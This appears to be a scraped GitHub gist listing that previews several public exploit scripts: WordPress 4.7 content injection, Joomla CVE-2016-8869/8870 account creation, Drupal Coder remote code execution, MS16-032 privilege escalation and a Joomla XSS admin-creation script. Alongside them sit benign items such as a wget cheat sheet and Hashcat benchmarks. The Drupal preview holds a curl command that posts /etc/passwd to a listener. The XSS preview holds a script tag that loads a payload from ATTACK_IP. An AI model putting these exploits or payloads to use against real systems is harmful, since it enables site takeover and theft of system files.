Amine Bendouil CCrashBandicot
@leonjza
leonjza / inject.py
Last active February 4, 2024 07:47
Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC
# 2017 - @leonjza
#
# Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC
# Full bug description: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
# Usage example:
#
# List available posts:
#
# $ python inject.py http://localhost:8070/
@Grebenschikov
Grebenschikov / exploit.php
Last active January 2, 2017 10:54
Joomla 3.4.4 - 3.6.3 exploit for CVE-2016-8869 and CVE-2016-8870
<?php
/*
* Author: Alexander Grebenschikov <me@package.su>
* Versions: 3.4.4 through 3.6.3
* Exploit type: Account Creation, Elevated Privileges
* CVE Number: CVE-2016-8869, CVE-2016-8870
* Fixed Date: 2016-October-25
*/
@Dammmien
Dammmien / wget.sh
Last active March 13, 2024 13:58
wget cheat sheet
# POST a JSON file and redirect output to stdout
wget -q -O - --header="Content-Type:application/json" --post-file=foo.json http://127.0.0.1
# Download a complete website
wget -m -r -linf -k -p -q -E -e robots=off http://127.0.0.1
# But it may be sufficient
wget -mpk http://127.0.0.1
# Download all images of a website
@Raz0r
Raz0r / drupal-coder-rce.php
Created July 22, 2016 15:12
SA-CONTRIB-2016-039
<?php
# Drupal module Coder Remote Code Execution (SA-CONTRIB-2016-039)
# https://www.drupal.org/node/2765575
# by Raz0r (http://raz0r.name)
$cmd = "curl -XPOST http://localhost:4444 -d @/etc/passwd";
$host = "http://localhost:81/drupal-7.12/";
$a = array(
@eyecatchup
eyecatchup / mr.robot_season-2_easter-egg-sites.md
Last active April 4, 2024 10:39
A collection of "Mr. Robot" Season 2 Easter Egg Sites. #mrrobot #hackingrobot #robotegg
function Invoke-MS16-032 {
<#
.SYNOPSIS
PowerShell implementation of MS16-032. The exploit targets all vulnerable
operating systems that support PowerShell v2+. Credit for the discovery of
the bug and the logic to exploit it go to James Forshaw (@tiraniddo) and @Fuzzysec for the original PS script.
Modifications by Mike Benich (@benichmt1).
Targets:
@epixoip
epixoip / 8x1080.md
Last active March 20, 2024 17:14
8x Nvidia GTX 1080 Hashcat Benchmarks
@MuhammetDilmac
MuhammetDilmac / joomla_admin_add.js
Created May 31, 2016 18:02
Joomla admin panel XSS script for adding an admin
/*
* Author: Gökmen Güreşçi & Muhammet Dilmaç
* Attack payload
* <script>var script = document.createElement('script');script.src = "http://ATTACK_IP/attack.js";document.getElementsByTagName('head')[0].appendChild(script);</script>
*/
var request = new XMLHttpRequest();
var req = new XMLHttpRequest();
var id = '';
var boundary = Math.random().toString().substr(2);
@cure53
cure53 / wordpress2.md
Last active January 8, 2021 17:55
WordPress SOME bug in plupload.flash.swf
@cure53
cure53 / wordpress.md
Last active February 1, 2023 22:47
WordPress Flash XSS in flashmediaelement.swf